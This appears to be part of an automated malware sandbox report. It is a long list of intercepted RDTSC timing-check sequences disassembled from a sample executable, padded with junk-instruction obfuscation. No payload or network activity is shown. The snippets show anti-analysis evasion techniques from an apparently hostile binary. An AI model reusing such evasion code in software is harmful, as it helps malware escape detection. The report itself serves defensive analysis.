                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAA48 second address: 9EAA53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC8BCD07016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAA53 second address: 9EAAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov cx, ax 0x0000000d jng 00007FC8BCFEEF0Ch 0x00000013 push 0000001Eh 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FC8BCFEEF08h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D230Eh], ecx 0x00000035 nop 0x00000036 jnp 00007FC8BCFEEF0Eh 0x0000003c push eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAE83 second address: 9EAF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push ebx 0x00000008 call 00007FC8BCD07018h 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 add dword ptr [esp+04h], 00000019h 0x0000001a inc ebx 0x0000001b push ebx 0x0000001c ret 0x0000001d pop ebx 0x0000001e ret 0x0000001f call 00007FC8BCD0701Dh 0x00000024 push eax 0x00000025 or dword ptr [ebp+122D20ADh], esi 0x0000002b pop edx 0x0000002c pop edx 0x0000002d pushad 0x0000002e mov eax, 356DE1EDh 0x00000033 pushad 0x00000034 xor dword ptr [ebp+122D3840h], ebx 0x0000003a popad 0x0000003b popad 0x0000003c clc 0x0000003d lea eax, dword ptr [ebp+12485831h] 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007FC8BCD07018h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d clc 0x0000005e mov dword ptr [ebp+122D2D03h], ecx 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FC8BCD0701Eh 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAF13 second address: 9EAF19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAF19 second address: 9EAF2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCD0701Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAF2C second address: 9EAF8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jbe 00007FC8BCFEEF1Ch 0x00000010 jmp 00007FC8BCFEEF16h 0x00000015 pop eax 0x00000016 nop 0x00000017 mov ecx, esi 0x00000019 lea eax, dword ptr [ebp+124857EDh] 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007FC8BCFEEF08h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 mov ecx, ebx 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e jne 00007FC8BCFEEF08h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAF8A second address: 9EAF94 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCD0701Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EAF94 second address: 9D258C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC8BCFEEF19h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC8BCFEEF08h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 or dword ptr [ebp+122D2B61h], esi 0x0000002d call dword ptr [ebp+1245CFA1h] 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC8BCFEEF19h 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36288 second address: A3629A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC8BCD07018h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A3629A second address: A362B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF12h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A362B9 second address: A362CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FC8BCD07016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FC8BCD07016h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A362CF second address: A362D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A362D3 second address: A362DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36A0E second address: A36A17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36A17 second address: A36A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36A20 second address: A36A3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007FC8BCFEEF0Ch 0x00000010 jp 00007FC8BCFEEF06h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36A3A second address: A36A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36A3E second address: A36A48 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCFEEF06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36B8C second address: A36B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36B91 second address: A36BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC8BCFEEF15h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36BAD second address: A36BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC8BCD07016h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36BBB second address: A36BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC8BCFEEF10h 0x0000000e jnc 00007FC8BCFEEF08h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36D62 second address: A36D8A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCD07016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FC8BCD07028h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36D8A second address: A36D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A36D8E second address: A36D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A39EDD second address: A39EEC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A39EEC second address: A39EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A39EF7 second address: A39EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A39EFB second address: A39F01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9A175C second address: 9A1760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9A1760 second address: 9A1773 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007FC8BCD07016h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9A6919 second address: 9A691D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9A691D second address: 9A693D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8BCD07018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FC8BCD0702Ah 0x00000010 push eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnc 00007FC8BCD07016h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A42F56 second address: A42F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 ja 00007FC8BCFEEF2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A430AD second address: A430C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FC8BCD0701Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A430C6 second address: A430CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A430CA second address: A430F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FC8BCD07016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC8BCD07026h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FC8BCD07016h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A43218 second address: A4321E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A4321E second address: A43230 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC8BCD0701Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A4519B second address: A451A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A451A1 second address: A451DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC8BCD07018h 0x0000000c jmp 00007FC8BCD07022h 0x00000011 jmp 00007FC8BCD0701Eh 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a js 00007FC8BCD07016h 0x00000020 pop edi 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A495EA second address: A495F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A497B3 second address: A497B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A497B7 second address: A497BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A49914 second address: A49919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A49919 second address: A49932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF15h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A49932 second address: A49936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A49936 second address: A4993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9A9D5B second address: 9A9DA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007FC8BCD07016h 0x00000019 popad 0x0000001a jmp 00007FC8BCD07021h 0x0000001f pushad 0x00000020 push edx 0x00000021 pop edx 0x00000022 jng 00007FC8BCD07016h 0x00000028 pushad 0x00000029 popad 0x0000002a jnp 00007FC8BCD07016h 0x00000030 popad 0x00000031 push ebx 0x00000032 pushad 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A4DF07 second address: A4DF13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC8BCFEEF0Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A4DF13 second address: A4DF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A4E4CC second address: A4E4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55F3C second address: A55F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007FC8BCD07028h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A53F3D second address: A53F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF17h 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A540C0 second address: A540F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07020h 0x00000009 popad 0x0000000a jmp 00007FC8BCD07029h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A544BD second address: A544C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A544C2 second address: A544CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A54AD1 second address: A54AED instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8BCFEEF06h 0x00000008 jmp 00007FC8BCFEEF0Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A54AED second address: A54AF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A54AF7 second address: A54B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ch 0x00000007 jp 00007FC8BCFEEF06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55010 second address: A55016 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55016 second address: A55032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF18h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55032 second address: A55036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5561E second address: A55641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF0Dh 0x00000009 jmp 00007FC8BCFEEF0Fh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A55947 second address: A5594D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5594D second address: A5595F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF0Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A59E9D second address: A59EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07026h 0x00000007 jmp 00007FC8BCD0701Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A024 second address: A5A02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A02A second address: A5A02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A2CD second address: A5A2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A5C0 second address: A5A5E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC8BCD07023h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A5E8 second address: A5A612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF12h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FC8BCFEEF12h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A5A612 second address: A5A61C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC8BCD07016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B31 second address: A67B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B35 second address: A67B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B41 second address: A67B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B47 second address: A67B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B4B second address: A67B57 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCFEEF06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B57 second address: A67B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B5C second address: A67B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A67B62 second address: A67B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC8BCD07016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A65F30 second address: A65F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A65F36 second address: A65F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A65F3E second address: A65F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A661E1 second address: A661E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
